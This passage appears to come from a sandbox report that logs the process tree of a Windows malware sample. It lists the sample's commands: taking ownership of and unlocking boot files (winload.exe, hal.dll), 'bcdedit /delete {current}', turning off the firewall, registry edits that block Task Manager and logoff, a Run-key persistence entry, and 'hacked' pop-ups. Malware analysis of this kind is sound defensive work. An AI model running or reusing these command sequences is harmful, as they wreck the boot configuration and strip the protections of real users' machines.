        7⤵
        
        PID:11504
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11720
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:5152
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB96.tmp\BB97.tmp\BBF5.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:7916
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10828
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:7912
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:12400
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:12688
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:1664
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5548
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5640
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5780
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5852
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:6132
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2C4B.tmp\2C4C.tmp\2C4D.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:4156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:5992
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:944
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:7300
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:7808
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7096
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:5524
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7768
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4624
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:2736
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6756
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:6504
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:1208
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:2056
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:3516
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7936
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:2288
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:6548
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8220
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8336
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8348
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8356
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8384
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8512
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8604
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8668
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8828
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8904
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9176
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1A16.tmp\1A17.tmp\1A18.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:10876
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2456
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Modifies file permissions
        
        PID:6096
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:12884
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:8240
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9184
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:5880
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8820
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:9516
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3DAB.tmp\3DAC.tmp\3DAD.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:9876
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9732
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9924
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10128
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9476
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:10420
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6AF5.tmp\6AF6.tmp\6AF7.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:10840
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10608
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10896
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:11072
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:11020
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10700
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:4856
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12656
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10384
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5928
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6156
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6200
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:6208
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:6624
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3CC6.tmp\3CC7.tmp\3CC8.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:6820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:2392
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Possible privilege escalation attempt
        
        PID:7504
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:6296
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8000
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5220
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3812
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:3244
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7164
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4644
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:7864
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:4936
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:6112
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:1240
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:2748
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:4624
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:5192
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8272
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10468
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:10680
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:10920
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11156
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:11168
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11408
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:11640
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:11892
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:12224
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6544
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:12232
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C450.tmp\C451.tmp\C462.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:12436
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:11936
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:12360
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:12624
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:13032
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8372
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:6724
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:6808
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:6928
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:7020
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:6008
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3704
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7428
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7680
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:7880
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        
        PID:8176
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:8116
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:7836
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:8080
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:3572
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3812
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1496
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:4380
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:5020
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    PID:1812
- - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
    3⤵
    PID:2960
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BF29.tmp\BF2A.tmp\BF2B.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
      4⤵
      PID:1248
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:2148
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:964
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3872
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Modifies file permissions
        
        PID:3940
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3132
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        Views/modifies file attributes
        
        PID:1648
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1996
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3120
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3916
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4176
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        Modifies file permissions
        
        PID:4928
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2056
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:1008
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:1112
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2304
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:3940
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        
        PID:2252
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Views/modifies file attributes
        
        PID:4952
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3132
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:1736
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:4588
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3628
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5180
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5232
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5292
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5360
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5408
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5472
    - - C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        5⤵
        
        PID:5536
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\18E2.tmp\18E3.tmp\18E4.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        6⤵
        
        PID:5712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:7328
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:8016
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:7604
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:7824
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:8080
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:6124
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        
        PID:1844
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:5284
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Possible privilege escalation attempt
        
        PID:3748
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:4972
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:1984
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:3320
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:7656
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:4448
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:6740
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:8000
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:8052
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5340
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7396
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:3516
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:896
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:5848
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7564
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:6740
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:6992
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:1480
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8116
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FF0C.tmp\FF1D.tmp\FF1E.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:8288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:12052
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        10⤵
        Modifies file permissions
        
        PID:9900
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        
        PID:7656
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        9⤵
        Possible privilege escalation attempt
        
        PID:12732
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        9⤵
        Views/modifies file attributes
        
        PID:12620
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8212
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8316
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8468
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8568
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        
        C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe
        7⤵
        
        PID:8984
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\14D6.tmp\14E7.tmp\14E8.bat C:\Users\Admin\AppData\Local\Temp\690ca0a28e2657855d2e2f85a3da01be4d0e8f971878a7913f37a6a0f8376408.exe"
        8⤵
        
        PID:9080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        9⤵
        
        PID:13016
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        9⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:11588
        
        C:\Windows\explorer.exe
        
